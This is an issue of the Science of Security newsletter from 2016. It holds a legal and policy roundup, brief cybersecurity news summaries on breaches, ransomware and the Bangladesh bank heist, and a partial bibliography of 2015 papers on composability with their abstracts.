Science of Security (SoS) Newsletter (2016 - Issue 5)

Newsletter Banner

Science of Security (SoS) Newsletter (2016 - Issue 5)


Each issue of the SoS Newsletter highlights achievements in current research, as conducted by various global members of the Science of Security (SoS) community. All presented materials are open-source, and may link to the original work or web page for the respective program. The SoS Newsletter aims to showcase the great deal of exciting work going on in the security community, and hopes to serve as a portal between colleagues, research projects, and opportunities.

Please feel free to click on any issue of the Newsletter, which will bring you to their corresponding subsections:

Publications of Interest

The Publications of Interest provides available abstracts and links for suggested academic and industry literature discussing specific topics and research problems in the field of SoS. Please check back regularly for new information, or sign up for the CPSVO-SoS Mailing List.

(ID#:16-8944)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Cyber Scene #2

 

 
SoS Logo

Cyber Scene #2

 

This addition to the Newsletter is intended to provide an informative, timely backdrop of events, thinking, and developments that feed into technological advancement of SoS Cybersecurity collaboration and extend its outreach.


 

 

Cybersecurity:  Raising the Bar

Legal perspectives on overarching academic, Intelligence Community, private sector industry, and Congressional concerns

  

(1) The American Bar Association Standing Committee on Law and National Security continues its work begun in 1962 on educating the Bar and the public on rule of law issues to preserve the freedoms of democracy and national security. To that effect, the Cybersecurity Working Group was founded in 2012, and by the end of 2013, had compiled, for “educational and informational purposes” — (many legal disclaimers here!) “The Playbook for Cyber Events” and “The ABA Cybersecurity Handbook.” The working group continues, with support from its Cybersecurity Legal Task Force, to convene and explore contemporary as well as future legal aspects of cybersecurity concerns and be poised, a priori, for action. Read more at: http://www.americanbar.org/groups/public_services/law_national_security.html and http://www.americanbar.org/groups/leadership/office_of_the_president/cybersecurity.html

Three events in Washington D.C. are slated for June–November 2016 to advance this forum’s discussion and understanding. They are:

  1. 8 June 2016, NYU in Washington D.C. The Honorable James E. Baker, Chief Judge (ret.), U.S. Court of Appeals for the Armed Forces and Chair, ABA Standing Committee on Law and National Security will introduce a forum including the authors Zachary Goldman and Samuel Rascoff to discuss their book, Global Intelligence Oversight that addresses cybersecurity among related topics. ABA National Security Chair Harvey Rishikof will moderate.
    See: http://www.americanbar.org/content/dam/aba/images/law_national_security/book-talk-june-8-flyer.pdf
     
  2. 24-25 August 2016, 11th Annual Homeland Security Law Institute, Washington Convention Center, Washington D.C.
    See: http://shop.americanbar.org/ebus/ABAEventsCalendar/EventDetails.aspx?productId=240666089
     
  3. 14-15 November 2016, The 26th Annual Review of the Field of National Security Law, Washington D.C.
    See: http://www.americanbar.org/groups/public_services/law_national_security.html
     

(2) Relatedly, both formal publications (e.g., law reviews) and informal blogs are addressing legal cybersecurity issues on today’s table. The Harvard National Security Journal (http://harvardnsj.org/2016/02/volume-7-1/) is a law-student/think tank joint venture affiliated with the Harvard Law School - Brookings Project on Law and Security capturing both broad governmental perspectives (e.g., the Assistant Attorney General for National Security address to Harvard Law on future options) and animated blog-based exchanges. One such blog post, Susan Landau's “Don't Panic” from Harvard’s Berkman Center, posited that growth of strong encryption would not significantly hinder intelligence or law enforcement collection. This has launched an even more academic, legal, and Intelligence Community and Congressional spirited response over the last 2 weeks (through 21 May to date), including the Director of National Intelligence, Jim Clapper, who countered in a letter to Senator Wyden that Landau’s Berkman Center report was wrong, and that “the impediments to our efforts to protect the nation...cannot be fully mitigated by alternative means.” This debate continues to spawn a host of thoughtful legal opinions—law professors, students, the Journal of National Security Law and Policy, Heritage Foundation, Brookings and Stanford’s Hoover Institutions, as well as present homeland security consultants and present and former senior DHS and IC officials. See https://www.lawfareblog.com/ic-thinks-harvard-wrong-about-encryption for a sampling and useful links.


(ID#: 16-11359)

In the News

 

 
SoS Logo

In The News

 

This section features topical, current news items of interest to the international security community. These articles and highlights are selected from various popular science and security magazines, newspapers, and online sources.


US News     

 

“FDIC Reports Five ‘Major Incidents’ of Cybersecurity Breaches Since Fall,” The Washington Post, 9 May 2016. [Online].
The FDIC reported five major breaches of taxpayers’ personal information since the 30th of last October. They define a major incident as a breach of at least 10,000 records. All five of the incidents were similar in nature. Employees accidently transferred the files to USB devices. As a precaution, all removable media has been blocked. 
See: https://www.washingtonpost.com/news/powerpost/wp/2016/05/09/fdic-reports-five-major-incidents-of-cybersecurity-breaches-since-fall/

 

“McAfee Confirms He'll Head Cybersecurity Company,” USA Today, 10 May 2016. [Online].
John McAfee confirmed that he would be taking over as CEO of tech company MGT Capital Investments, previously known mostly for its development of mobile games. The company will be rebranding itself to focus on cybersecurity and privacy. McAfee says that the company's first product will be “D-Vasive,” anti-spyware for smartphones that secures the device's camera, microphone, and Bluetooth.
See: http://www.usatoday.com/story/tech/2016/05/09/john-mcafee-head-tech-company/84136762/

 

“Congress Warned About Cybersecurity After Attempted Ransomware Attack on House,” Tech Crunch, 10 May 2016. [Online].
A new wave of ransomware attacks was launched at the U.S. House of Representatives recently. The attacks targeted House members mainly through third-party email apps like YahooMail and Gmail, prompting officials to block access to YahooMail on their network altogether. It is unknown whether any of the ransomware attacks were successful or not.
See: http://techcrunch.com/2016/05/10/congress-warned-about-cybersecurity-after-attempted-ransomware-attack-on-house/

 

“Computer Science Teachers Need Cybersecurity Education Says CSTA Industry Group,” Tech Republic, 10 May 2016. [Online].
The Computer Science Teachers Association is creating a new 8-hour program to help educate middle school and high school teachers on cybersecurity. Shockingly, only ten percent of those teachers have degrees in computer science with most coming from backgrounds in related fields like math. The program is aiming to bring these teachers up to speed on topics such as compliance and authentication.
See: http://www.techrepublic.com/article/cs-teachers-ramping-up-cybersecurity-education/
 

 

International News 

 

“Why Automation is the Key to the Future of Cyber Security,” Network World, 3 May 2016. [Online].
The complexity and volume of cyber attacks have been rapidly growing for quite some time, and the ugly truth is that it is near impossible to keep up with all of them. It would make perfect sense to automate some of the tasks associated with security; however, it is not that simple. This article explores some of the challenges companies face with automating cyber security.
See: http://www.networkworld.com/article/3065296/security/why-automation-is-the-key-to-the-future-of-cyber-security.html

 

“Will Artificial Intelligence Revolutionize Cybersecurity?,” The Christian Science Monitor, 4 May 2016. [Online].
Artificial intelligence (AI) is being examined as a possible means for improving cybersecurity. AI is more popular than ever, and some researchers believe that it can be used to monitor attacks or even attempt to break systems. Additionally, the White House is hosting a series of workshops to explore the potential benefits of incorporating artificial intelligence into cybersecurity.
See: http://www.csmonitor.com/World/Passcode/2016/0504/Will-artificial-intelligence-revolutionize-cybersecurity

 

“Cyberattacks: Two-Thirds of All Big Businesses in UK Breached in the Past Year,” International Business Times, 8 May 2016. [Online].
A new survey shows that nearly two-thirds of big businesses in the UK suffered from a data breach in 2015. Additionally, roughly a quarter of all businesses in the UK were hacked in some way, the most common attacks coming in the form of malware, spyware, or other viruses, and impersonation of the organisation. Perhaps even more surprising is the fact that 70% of the attacks were preventable.
See: http://www.ibtimes.co.uk/cyber-attacks-two-thirds-all-big-businesses-uk-breached-past-year-1558852

 

“Top 2016 Cybersecurity Reports Out from AT&T, Cisco, Dell, Google, IBM, McAfee, Symantec and Verizon,” Forbes, 9 May 2016. [Online].
Several major companies have published their reports on cybersecurity for 2016. The companies include AT&T, Cisco, Dell, Google, IBM, McAfee, Symantec, and Verizon. The reports include each company's take on topics such as data breaches, defense strategies, and cybercrime.
See: http://www.forbes.com/sites/stevemorgan/2016/05/09/top-2016-cybersecurity-reports-out-from-att-cisco-dell-google-ibm-mcafee-symantec-and-verizon/#19d7bf483edb

 

“$81 Million Bangladesh Bank Heist Sparks Push for Stepped-Up Cybersecurity,” NPR, 24 May 2016. [Online].
Following a shocking $81 million heist from the central bank of Bangladesh, SWIFT CEO Gottfried Leibbrandt says they are going after the cyber criminals. The Society for Worldwide Interbank Financial Telecommunication (SWIFT) is the messaging system responsible for transferring billions of dollars each day. SWIFT was long believed to be highly secure; however, Leibbrandt revealed that they are aware of at least two other breaches. See: http://www.npr.org/sections/thetwo-way/2016/05/24/479311978/-81-million-bangladesh-bank-heist-sparks-push-for-stepped-up-cybersecurity

 

“UK Government Details Plans for National Cyber Security Centre,” Computer Weekly, 26 May 2016. [Online].
The U.K. has released a plan for its recently revealed National Cyber Security Centre. The plan includes four main objectives for
the centre:

  • To understand the cyber security environment, share knowledge, and use that expertise to identify and address systemic vulnerabilities; 
  • To reduce risks to the UK by working with public and private sector organisations to improve their cyber security; 
  • To respond to cyber security incidents to reduce the harm they cause to the UK; and
  • To nurture and grow our national cyber security capability, and provide leadership on critical national cyber security issues.

See: http://www.computerweekly.com/news/450297182/UK-Government-details-plans-for-National-Cyber-Security-Centre

 

“Brazilian Companies Rank Worst Among Major Economies on Cyber Security: Report,” Yahoo, 26 May 2016. [Online].
A recent report from security ratings company BitSight showed that cybersecurity metrics of companies based in Brazil were significantly poorer than those of most other major economies included in the study. Some of Brazil's weakest points included compromise rates, email security, and file sharing practices. Additionally, nearly half of all Brazilian companies took part in dangerous file sharing on a company network, whereas the rate for most other countries was closer to a quarter or a third.
See: https://www.yahoo.com/tech/brazilian-companies-rank-worst-among-major-economies-cyber-090350492.html


(ID#: 16-11358)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.

Publications of Interest

 

 
SoS Logo

Publications of Interest

 

The Publications of Interest section contains bibliographical citations, abstracts if available, and links on specific topics and research problems of interest to the Science of Security community.

How recent are these publications?

These bibliographies include recent scholarly research on topics which have been presented or published within the past year. Some represent updates from work presented in previous years; others are new topics.

How are topics selected?

The specific topics are selected from materials that have been peer reviewed and presented at SoS conferences or referenced in current work. The topics are also chosen for their usefulness for current researchers.

How can I submit or suggest a publication?

Researchers willing to share their work are welcome to submit a citation, abstract, and URL for consideration and posting, and to identify additional topics of interest to the community. Researchers are also encouraged to share this request with their colleagues and collaborators.

Submissions and suggestions may be sent to: news@scienceofsecurity.net

(ID#:16-11188)


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence

Composability 2015

 

 
SoS Logo

Composability

2015

 

Composability is one of the five hard problems for the Science of Security. The work cited here was presented in 2015.



Gabriel Fernandez et al.“Seeking Time-Composable Partitions of Tasks for COTS Multicore Processors,” Real-Time Distributed Computing (ISORC), 2015 IEEE 18th International Symposium on, Auckland, 2015, vol., no., pp. 208–217. doi:10.1109/ISORC.2015.43
Abstract: The timing verification of real-time single core systems involves a timing analysis step that yields an Execution Time Bound (ETB) for each task, followed by a schedulability analysis step, where the scheduling attributes of the individual tasks, including the ETB, are studied from the system level perspective. The transition between those two steps involves accounting for the interference effects that arise when tasks contend for access to shared resource. The advent of multicore processors challenges the viability of this two-step approach because several complex contention effects at the processor level arise that cause tasks to be unable to make progress while actually holding the CPU, which are very difficult to tightly capture by simply inflating the tasks’ ETB. In this paper we show how contention on access to hardware shared resources creates a circular dependence between the determination of tasks’ ETB and their scheduling at runtime. To help loosen this knot we present an approach that acknowledges different flavors of time composability, examining in detail the variant intended for partitioned scheduling, which we evaluate on two real processor boards used in the space domain.
Keywords: formal verification; multiprocessing systems; COTS multicore processors; ETB; circular dependence; execution time bound; hardware shared resources; interference effects; real processor boards; real-time single core systems; schedulability analysis step; seeking time composable partitions; space domain; timing analysis; timing verification; Hardware; Multicore processing; Processor scheduling; Program processors; Resource management; Scheduling; Timing; COTS Multicores; Task Allocation in Multicores; Time Composability (ID#: 16-9527)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7153808&isnumber=7153773

 

J. Waters; J. Pilcher; B. Plutchak; E. Voncolln; D. Grady; R. Patel, “Describing and Reusing Warfighter Processes and Products: An Agile Training Framework,” Cognitive Methods in Situation Awareness and Decision Support (CogSIMA), 2015 IEEE International Multi-Disciplinary Conference on, Orlando, FL, 2015, vol., no., pp. 140–144. doi:10.1109/COGSIMA.2015.7108189
Abstract: This position paper describes a framework, i.e. a set of design and architecture recommendations, for achieving agile training. The approach for the design is to be process and data driven, focused on reusability, and borrowing basic principles derived from web-based architectures, semantic processing, user-centered design, composability, complexity management, machine-understandability, scalability, gaming and open linked data. The fundamental features of the framework are open, easily understood, easily implemented, and tool-agnostic. With such a framework defined, the training community could collaborate to build out the more extensive cloud content, extend the capability and ensure that the benefits of agile training are achieved, namely more focused and faster training on shared processes anytime, anywhere at reduced cost and without a large support staff.
Keywords: computer based training; military computing; Web-based architectures; agile training framework; cloud content; complexity management; composability; gaming; machine-understandability; open linked data; scalability; semantic processing; user-centered design; warfighter process; warfighter products; Communities; Conferences; Process control; Scalability; Standards; Training; Uniform resource locators; Agile; Decision making; Training; applications; command and control; resource allocation and management; standards; web services (ID#: 16-9528)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7108189&isnumber=7107964

 

Yonglin Lei; Ning Zhu; Jian Yao; Zhi Zhu; H.S. Sarjoughian, “Model-Architecture Oriented Combat System Effectiveness Simulation,” Winter Simulation Conference (WSC), 2015, Huntington Beach, CA, USA, 2015, vol., no., pp. 3190–3191. doi:10.1109/WSC.2015.7408464
Abstract: Combat system effectiveness simulation (CESS) is a special type of complex system simulation. Three non-functional requirements (NFRs), i.e. model composability, domain-specific modeling, and model evolvability are gaining higher priority from CESS users when evaluating different modeling methodologies for CESS. Traditional CESS modeling methodologies are either domain-neutral (lack of domain characteristics consideration and limited support for model composability) or domain-oriented (lack of openness and evolvability) and fall short of the three NFRs. Inspired by the concept of architecture in systems engineering and software engineering fields, we extend it into a concept of model architecture for complex simulation systems, and propose a model-architecture oriented modeling methodology in which model architecture plays a central role in achieving the three NFRs. Various model-driven engineering (MDE) approaches and technologies, including SMP, UML, DSM, and so forth, are applied where possible in representing the CESS model architecture and its components’ behaviors from physical and cognitive domain aspects.
Keywords: Architecture; Complex systems; Computer architecture; Modeling; Software engineering; Standards; Unified modeling language (ID#: 16-9529)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7408464&isnumber=7408148

 

J. Voas, “Keynote Speech: Foundations of the Internet of Things, by Jeffrey Voas,” Trustworthy Systems and Their Applications (TSA), 2015 Second International Conference on, Hualien, 2015, vol., no., pp. xiii–xiii. doi:10.1109/TSA.2015.11
Abstract: Eight core primitives belonging to most distributed computing systems, and in particular, systems with large amounts of data, scalability concerns, heterogeneity concerns, temporal concerns, actors of unknown pedigree and possible nefarious intent, is presented. Primitives allow formalisms, reasoning, simulations, and reliability and security risk-tradeoffs to be formulated and argued. These eight primitives are basic building blocks for a Network of ‘Things’ (NoT), including the Internet of Things (IoT), an emerging ‘new’ distributed computing paradigm. They are: sensor, snapshot (time), cluster, aggregator, weight, communication channel, eUtility, and decision A composability model and vocabulary that defines principles common to most, if not all NoTs, is needed. For example, “what is the science, if any, underlying the IoT”? Primitives offer answers by allowing comparisons between one NoT architecture to another. They offer a unifying vocabulary that allows for composition and information exchange among differently purposed networks. And they prove useful towards more subtle concerns, including interoperability, composability, and late-binding of assets that come and go on-the-fly, all of which are large concerns for IoT.
Keywords: Internet of Things; inference mechanisms; security of data; Network of Things; communication channel; distributed computing paradigm; distributed computing systems; e Utility; eight core primitives; information exchange; reasoning; security risk-tradeoffs; simulations (ID#: 16-9530)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7335937&isnumber=7335925

 

J.C.S. dos Anjos et al., “SMART: An Application Framework for Real Time Big Data Analysis on Heterogeneous Cloud Environments,” Computer and Information Technology; Ubiquitous Computing and Communications; Dependable, Autonomic and Secure Computing; Pervasive Intelligence and Computing (CIT/IUCC/DASC/PICOM), 2015 IEEE International Conference on, Liverpool, 2015, vol., no., pp. 199–206. doi:10.1109/CIT/IUCC/DASC/PICOM.2015.29
Abstract: The amount of data that human activities generate poses a challenge to current computer systems. Big data processing techniques are evolving to address this challenge, with analysis increasingly being performed using cloud-based systems. Emerging services, however, require additional enhancements in order to ensure their applicability to highly dynamic and heterogeneous environments and facilitate their use by Small & Medium-sized Enterprises (SMEs). Observing this landscape in emerging computing system development, this work presents Small & Medium-sized Enterprise Data Analytic in Real Time (SMART) for addressing some of the issues in providing compute service solutions for SMEs. SMART offers a framework for efficient development of Big Data analysis services suitable to small and medium-sized organizations, considering very heterogeneous data sources, from wireless sensor networks to data warehouses, focusing on service composability for a number of domains. This paper presents the basis of this proposal and preliminary results on exploring application deployment on hybrid infrastructure.
Keywords: Big Data; cloud computing; data analysis; data warehouses; small-to-medium enterprises; wireless sensor networks; SMART; SME; cloud-based system; computing system development; data warehouse; heterogeneous cloud environment; real time Big data analysis; small-and-medium-sized enterprise data analytic-in-real time; small-and-medium-sized organization; wireless sensor network; Big data; Cloud computing; Data models; Monitoring; Performance evaluation; Quality of service; Real-time systems; Cloud Computing; Data Analytics; Hybrid Clouds; SMEs (ID#: 16-9531)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7363071&isnumber=7362962

 

R. Udechukwu; R. Duttay, “Service Definition Semantics for Optical Services on a Choice-Based Network,” Optical Network Design and Modeling (ONDM), 2015 International Conference on, Pisa, 2015, vol., no., pp. 98–103. doi:10.1109/ONDM.2015.7127281
Abstract: Optical networks continue to provide the high-performance, high-bandwidth substrate of the planetary communication networks. The rapidly increasing and changing variety of demands placed on such networks requires that optical networks be increasingly agile and responsive to end-consumer traffic needs. Because of multiple levels of aggregation, the optical core is generally less responsive to changing needs at access levels. We have previously proposed that providing architectural mechanisms that allow the provider to inform the customer of available alternatives enables a co-optimization of network resources jointly by customers and providers, leading to better performance for the customer while utilizing resources more efficiently for the provider. In this paper, we show how optical switching capabilities may be abstracted as services to enable the automatic composability that is required for such a system. We have successfully demonstrated a proof-of-concept prototype of this architecture in the GENI environment, which we briefly describe.
Keywords: optical fibre networks; optical switches; telecommunication traffic; GENI environment; architectural mechanisms; choice-based network; end-consumer traffic; network resources cooptimization; optical networks; optical services; optical switching capabilities; planetary communication networks; service definition semantics; Adaptive optics; Optical buffering; Optical design; Optical network units; Optical packet switching; Optical switches (ID#: 16-9532)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7127281&isnumber=7127253

 

A. Benin; S. Toledo; E. Tromer, “Secure Association for the Internet of Things,” Secure Internet of Things (SIoT), 2015 International Workshop on, Vienna, Austria, 2015, vol., no., pp. 25–34. doi:10.1109/SIOT.2015.14
Abstract: Existing standards (ZigBee and Bluetooth Low Energy) for networked low-power wireless devices do not support secure association (or pairing) of new devices into a network: their association process is vulnerable to man-in-the-middle attacks. This paper addresses three essential aspects in attaining secure association for such devices. First, we define a user-interface primitive, oblivious comparison, that allows users to approve authentic associations and abort compromised ones. This distills and generalizes several existing approve/abort mechanisms, and moreover we experimentally show that OC can be implemented using very little hardware: one LED and one switch. Second, we provide a new Message Recognition Protocol (MRP) that allows devices associated using oblivious comparison to exchange authenticated messages without the use of public key cryptography (which exceeds the capabilities of many IoT devices). This protocol improves upon previously proposed MRPs in several respects. Third, we propose a robust definition of security for MRPs that is based on universal composability, and show that our MRP protocol satisfies this definition.
Keywords: Bluetooth; Cameras; Light emitting diodes; Materials requirements planning; Protocols; Standards; Zigbee
(ID#: 16-9533)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7411835&isnumber=7411823

 

Gabriel Fernandez et al.“Resource Usage Templates and Signatures for COTS Multicore Processors,” Design Automation Conference (DAC), 2015 52nd ACM/EDAC/IEEE, San Francisco, CA, 2015, vol., no., pp. 1-6. doi:10.1145/2744769.2744858
Abstract: Upper bounding the execution time of tasks running on multi-core processors is a hard challenge. This is especially so with commercial-off-the-shelf (COTS) hardware that conceals its internal operation. The main difficulty stems from the contention effects on access to hardware shared resources (e.g, buses) which cause task’s timing behavior to depend on the load that co-runner tasks place on them. This dependence reduces time composability and constrains incremental verification. In this paper we introduce the concepts of resource-usage signatures and templates, to abstract the potential contention caused and incurred by tasks running on a multicore. We propose an approach that employs resource-usage signatures and templates to enable the analysis of individual tasks largely in isolation, with low integration costs, producing execution time estimates per task that are easily composable throughout the whole system integration process. We evaluate the proposal on a 4-core NGMP-like multicore architecture.
Keywords: multiprocessing systems; 4-core NGMP-like multicore architecture; COTS multicore processors; commercial-off-the-shelf hardware; hardware shared resources; low integration cost; resource usage templates; resource-usage signatures; task timing behavior; upper bounding; Delays; Industries; Kernel; Multicore processing; Real-time systems; System-on-chip (ID#: 16-9534)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7167309&isnumber=7167177

 

C. Huebner; A. Fedorov; C. Huth; C. Diedrich, “Extensible Distribution Grid Automation Using IEC 61131 in Simulation and Operation,” International ETG Congress 2015; Die Energiewende - Blueprints for the new energy age; Proceedings of, Bonn, Germany, 2015, vol., no., pp. 1–7. doi: not provided
Abstract: The implementation of active distribution grids as a precondition for the smart energy system requires a decentralized automation approach that is based on proven technologies and standards allowing for flexible extensibility of power grid automation functions. In a decentralized automation approach the secondary substations play a major role and need to be equipped with reliable measurement and control technology. This suggests the use of programmable logic controller (PLC) technology as described by the IEC 61131 standard. Existing secondary substations can be upgraded by such PLC-based systems to provide not just monitoring and remote control but also advanced smart grid functions. The key challenge of future-prove distribution grid automation is the extensibility of these functions in order to satisfy new requirements. Functional extensibility demands modularization and composability which is provided by IEC 61131-3 standard in form of function blocks. The development, evaluation and application of advanced power grid monitoring and control functions requires tools for integrated simulation of function blocks and the power grid model. Such a tool is developed in the research project MD-E4 based on the SIMBA# simulation platform. It is applied for design and evaluation of IEC 61131 based power flow, state estimation and control functions, which are also evaluated in practice by running on physical PLCs that are installed in secondary substations in the distribution grid of Magdeburg.
Keywords: not provided (ID#: 16-9535)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7388518&isnumber=7388454

 

T. Hatanaka; N. Chopra; M.W. Spong, “Passivity-Based Control of Robots: Historical Perspective and Contemporary Issues,” Decision and Control (CDC), 2015 54th IEEE Conference on, Osaka, Japan, 2015, vol., no., pp. 2450–2452. doi:10.1109/CDC.2015.7402575
Abstract: Passivity is one of the most physically appealing concepts in systems and control theory. The stored internal energy in a passive system is bounded from above by the externally supplied energy. It is well known that this energy dissipation property has important implications for closed-loop stability. Additionally, the passivity property is preserved with respect to feedback and parallel interconnections of passive systems. This composability property of passive systems is crucial in designing and analyzing highly networked systems. Due to these desirable features, the passivity paradigm has been widely utilized to achieve outstanding success in robot control, which is the main focus of the session. The tutorial session starts with a historical perspective on passivity-based robot control and its broad applicability to several important problems in robotics. Despite the long history, passivity-based robot control is being actively utilized in addressing emerging problems in robot control. Hence, the remainder of the session presents application of passivity-based robot control to address important research issues in bilateral teleoperation, visual feedback estimation and robot control, cooperative robot control, and mixed human-robot teams.
Keywords: Manipulators; Robot control; Robot kinematics; Synchronization; Tutorials; Visualization (ID#: 16-9536)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7402575&isnumber=7402066

 

J. Valencia; D. Goswami; K. Goossens, “Composable Platform-Aware Embedded Control Systems on a Multi-Core Architecture,” Digital System Design (DSD), 2015 Euromicro Conference on, Funchal, Madeira, Portugal, 2015, vol., no.,
pp. 502–509. doi:10.1109/DSD.2015.74
Abstract: In this work, we propose a design flow for efficient implementation of embedded feedback control systems targeted for multi-core platforms. We consider a composable tile-based architecture as an implementation platform and realise the proposed design flow onto one instance of this architecture. The proposed design flow implements the feedback loops in a data-driven fashion leading to time-varying sampling periods with short average sampling period. Our design flow is composed of two phases: (i) representing the timing behaviour imposed by the platform by a finite and known set of sampling periods, which is achieved exploiting the composability of the platform, and (ii) a linear matrix inequality (LMI) based platform-aware control algorithm that explicitly takes the derived platform timing characteristics and the shorter average sampling period into account. Our results show that the platform-aware implementation outperforms traditional control design flows (i.e., almost 2 times) in terms of quality of control (QoC).
Keywords: control engineering computing; control system synthesis; embedded systems; feedback; linear matrix inequalities; multiprocessing systems; time-varying systems; LMI based platform-aware control algorithm; composable platform-aware embedded control systems; composable tile-based architecture; control design flows; embedded feedback control systems; linear matrix inequality; multicore architecture; quality of control; short average sampling period; time-varying sampling periods; Clocks; Context; Control systems; Feedback control; Resource management; Time division multiplexing; Timing; composable; embedded control systems; lmi-based control; multi-core architecture; predictable; quality of control (ID#: 16-9537)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7302315&isnumber=7302233

 

M. Nikitchenko, “Intensionality, Compositionality, and Nominativity in Information System Development,” Intelligent Computing and Information Systems (ICICIS), 2015 IEEE Seventh International Conference on, Cairo, 2015, vol., no., pp. 1–2. doi:10.1109/IntelCIS.2015.7397186
Abstract: Summary form only given. Process of information system development consists of several phases including, in particular, system analysis, specification, design, and implementation. Each of these phases is based on some abstractions that can be roughly divided into two groups of general and specific abstractions respectively. In this talk we address to such general abstractions as intensionality, compositionality, and nominativity. Intensionality is understood in the traditional sense as a counterpart to extensionality that together complete each other and define the main aspects of notions in their integrity. Compositionality means that a system is constructed of smaller subsystems with the help of special construction operations called compositions. Nominativity emphasizes the importance of naming relations for system aspects description. We analyze and illustrate the use of the above mentioned abstractions in different phases of system development. Considering conventional mathematical formalisms we admit that they are based on the extensionality principle that restricts and complicates usage of such formalisms in system development. Therefore we construct formal mathematical structures based on the principles of intensionality, compositionality, and nominativity. These structures can be considered generalizations of traditional notions of algebras and logics for classes of “dynamic” data and functions. Introduction of such formalisms permits us to define also a special kind of intensionalized computability that better reflects specifics of executable components of information systems. We compare the constructed formalisms with the existing ones and demonstrate that they a rather expressive and more adequate for information system development.
Keywords: abstracting; information systems; abstractions; compositionality; compositions; construction operations; design phase; dynamic data; dynamic functions; formal mathematical structures; implementation phase; information system development process; intensionality; intensionalized computability; nominativity; specification phase; system analysis phase; system aspect description; Biographies (ID#: 16-9538)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7397186&isnumber=7397173

 

J.D. Haynes; D. Wisniewski; K. Görgen; I. Momennejad; C. Reverberi, “FMRI Decoding of Intentions: Compositionality, Hierarchy and Prospective Memory,” Brain-Computer Interface (BCI), 2015 3rd International Winter Conference on, Sabuk, South Korea, 2015, vol., no., pp. 1–3. doi:10.1109/IWW-BCI.2015.7073031
Abstract: In recent years multivariate decoding has allowed to test where and how mental representations can be decoded from neuroimaging signals, which sheds light on how these representations are encoded in the brain. In one line of experiments, we investigated how intentions are encoded in fMRI signals, thus revealing information in medial and lateral prefrontal regions. These informative neural representations were even present prior to the person’s awareness of their chosen intention. In comparison, for cued intentions we found information predominantly in lateral, but not medial prefrontal cortex. Intention coding in prefrontal cortex followed a compositional code and could also be observed across extended delays during which participants were busy performing other tasks. Taken together, our results suggest a systematic, compositional and hierarchical code in prefrontal cortex which intentions are encoded across delays while the mind is busy working on other tasks.
Keywords: biomedical MRI; brain; image coding; medical image processing; neurophysiology; FMRI decoding-of-intentions; brain encoding; compositional code; compositionality memory; extended delays; fMRI signal encoding; hierarchy memory; informative neural representations; intention coding; lateral prefrontal regions; medial prefrontal regions; multivariate decoding; neuroimaging signals; person awareness; prefrontal cortex; prospective memory; Decision support systems; Decoding; Libet-experiment; fMRI; intention; task set (ID#: 16-9539)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7073031&isnumber=7073013

 

N. Mavridis; S.B. Kundig; N. Kapellas, “Acquisition of Grounded Models of Adjectival Modifiers Supporting Semantic Composition and Transfer to a Physical Interactive Robot,” Advanced Robotics (ICAR), 2015 International Conference on, Istanbul, 2015, vol., no., pp. 244–251. doi:10.1109/ICAR.2015.7251463
Abstract: Compositionality is a property of natural language which is of prime importance: It enables humans to form and conceptualize potentially novel and complex ideas, by combining words. On the other hand, the symbol grounding problem examines the way meaning is anchored to entities external to language, such as sensory percepts and sensory-motor routines. In this paper we aim towards the exploration of the intersection of compositionality and symbol grounding. We thus propose a methodology for constructing empirically derived models of grounded meaning, which afford composition of grounded semantics. We illustrate our methodology for the case of adjectival modifiers. Grounded models of adjectively modified and unmodified colors are acquired through a specially designed procedure with 134 participants, and then computational models of the modifiers “dark” and “light” are derived. The generalization ability of these learnt models is quantitatively evaluated, and their usage is demonstrated in a real-world physical humanoid robot. We regard this as an important step towards extending empirical approaches for symbol grounding so that they can accommodate compositionality: a necessary step towards the deep understanding of natural language for situated embodied agents, such as sensor-enabled ambient intelligence and interactive robots.
Keywords: ambient intelligence; human-robot interaction; humanoid robots; natural language processing; adjectival modifiers; compositionality; grounded model acquisition; learnt models; natural language; physical interactive robot; real-world physical humanoid robot; semantic composition; sensor-enabled ambient intelligence; sensory percepts; sensory-motor routines; situated embodied agents; symbol grounding problem; Color; Computational modeling; Grounding; Image color analysis; Robot sensing systems; Semantics; adjectival modifiers; interactive robots; symbol grounding (ID#: 16-9540)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7251463&isnumber=7251419

 

A. McIver; C. Morgan; T. Rabehaja, “Abstract Hidden Markov Models: A Monadic Account of Quantitative Information Flow,” Logic in Computer Science (LICS), Proceedings of the 2015 30th Annual ACM/IEEE Symposium on, Kyoto, 2015, vol., no.,
pp. 597–608. doi:10.1109/LICS.2015.61
